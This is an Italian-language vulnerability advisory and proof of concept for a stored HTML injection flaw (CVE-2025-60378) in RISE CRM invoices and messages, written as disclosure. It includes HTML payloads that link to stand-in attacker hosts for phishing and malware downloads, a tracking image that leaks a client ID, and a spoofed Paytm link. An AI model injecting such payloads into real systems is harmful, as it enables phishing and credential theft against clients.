
Prova di concetto per l'iniezione HTML persistente in RISE CRM, che dimostra come utenti autenticati possano iniettare HTML dannoso in fatture e messaggi, portando a phishing e distribuzione di malware tramite email automatizzate e PDF.
⚠️ Avviso di Sicurezza
Una vulnerabilità critica di Iniezione HTML Persistente che interessa fatture, messaggistica e comunicazioni automatizzate
È stata scoperta una vulnerabilità critica di Iniezione HTML Persistente in RISE Ultimate Project Manager & CRM che consente a utenti autenticati di iniettare HTML dannoso nelle voci di fattura, nelle note dei clienti e nei moduli di messaggistica. Questo contenuto iniettato persiste nel database e viene automaticamente renderizzato nelle email rivolte ai clienti, nei PDF e nelle comunicazioni chat, consentendo attacchi di phishing su larga scala, compromissione della posta elettronica aziendale e distribuzione di malware tramite email/PDF.
| Attributo | Valore |
|---|---|
| ID CVE | CVE-2025-60378 |
| Tipo | Iniezione HTML Persistente |
| CWE | CWE-79 |
| Vettore di Attacco | Rete/Remoto |
| Autenticazione | Richiesta (Privilegi Bassi) |
| Interazione Utente | Nessuna |
| Gravità | ALTA |
| CVSS v3.1 | 8.1 - Alta |
| Scopritore | Ajansha Shankar |
RISE CRM non riesce a sanificare e codificare correttamente il contenuto HTML in diversi campi modificabili dall'utente, incluse fatture, messaggi e note dei clienti. Quando utenti autenticati iniettano payload HTML in questi campi, il contenuto viene memorizzato nel database senza un filtraggio adeguato. Successivamente, questo HTML dannoso viene automaticamente renderizzato nelle email rivolte ai clienti, negli allegati PDF e nei moduli di messaggistica/chat senza una corretta codifica. Le fatture ricorrenti e la messaggistica automatizzata amplificano l'attacco distribuendo contenuti dannosi a più destinatari contemporaneamente.
| Fattore | Impatto | Spiegazione |
|---|---|---|
| Riservatezza | 🔴 ALTA | Le credenziali dei clienti e i dati sensibili possono essere raccolti tramite phishing |
| Integrità | 🔴 ALTA | Il contenuto dannoso può alterare la percezione delle comunicazioni e delle relazioni commerciali |
| Disponibilità | 🟡 BASSA | Impatto diretto limitato sulla disponibilità del sistema |
Un attaccante con accesso a privilegi bassi come project manager crea una fattura con HTML dannoso:
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>
La fattura viene inviata a oltre 100 clienti tramite email automatizzata. Tutti i clienti ricevono quella che sembra una fattura legittima che li indirizza a un sito di phishing. L'attaccante raccoglie le credenziali di più vittime contemporaneamente.
Un attaccante inietta HTML dannoso in un messaggio per il cliente:
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>
Tutti i membri del team e i clienti ricevono il messaggio nella loro chat e cliccando sui link scaricano malware.
Un attaccante configura una fattura ricorrente con un payload di distribuzione malware. Ogni mese, i clienti ricevono automaticamente fatture con contenuto dannoso incorporato, fornendo un vettore di attacco persistente.
Navigare a: Dashboard RISE CRM → Fatture/Messaggi → Crea Nuovo
<a href="https://attacker.com">Click here to view invoice</a>
<a href="https://evil.com" target="_blank">
<img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
✅ L'HTML iniettato viene renderizzato in email, PDF e messaggistica senza codifica ✅ I link sono cliccabili e reindirizzano ai siti dell'attaccante ✅ Le immagini vengono caricate da server controllati dall'attaccante ✅ Il contenuto persiste in tutte le future comunicazioni con i clienti ✅ La distribuzione ricorrente raggiunge automaticamente più destinatari